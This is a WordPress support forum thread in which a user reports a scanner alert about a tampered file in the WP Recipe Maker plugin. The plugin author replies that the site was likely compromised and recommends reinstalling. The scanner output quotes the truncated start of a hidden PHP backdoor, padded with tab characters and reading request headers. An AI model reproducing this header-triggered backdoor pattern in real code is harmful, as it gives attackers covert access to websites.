Some malware found in plugin?

  • Resolved netzenrob

    (@netzenrob)


    3 years, 2 months ago

    What is this?

    Filename: /html/wp-content/plugins/wp-recipe-maker/includes/public/shortcodes/deprecated/class-wprm-sc-nutrition-container.php

    • File Type: Plugin
    • Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: <?php\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09\x09$_HEADERS=getallheaders();if(isset($_HEADERS[

    Thansk, Rob

Viewing 1 replies (of 1 total)
  • Plugin Author Brecht

    (@brechtvds)

    3 years, 2 months ago

    Hi Rob,

    That is not what is supposed to be in that /wp-recipe-maker/includes/public/shortcodes/deprecated/class-wprm-sc-nutrition-container.php file.

    We are not using $_HEADERS anywhere in our plugin. You can confirm that this file doesn’t look like that when you download WPRM using the download button over at https://ww.wp.xz.cn/plugins/wp-recipe-maker/ as well.

    If that file does look like this on your site, then someone must have gained access or used an exploit and changed the contents of that file. If that’s the case, it’s probably not restricted to our plugin and I would expect other files to have changed as well.

    I’d start by removing WPRM altogether and installing it again through the Plugins > Add New page. That makes sure you’re using our version of the plugin and not some modified code.

    This article might help as well: https://jetpack.com/blog/what-to-do-if-your-wordpress-site-is-hacked/

Viewing 1 replies (of 1 total)

The topic ‘Some malware found in plugin?’ is closed to new replies.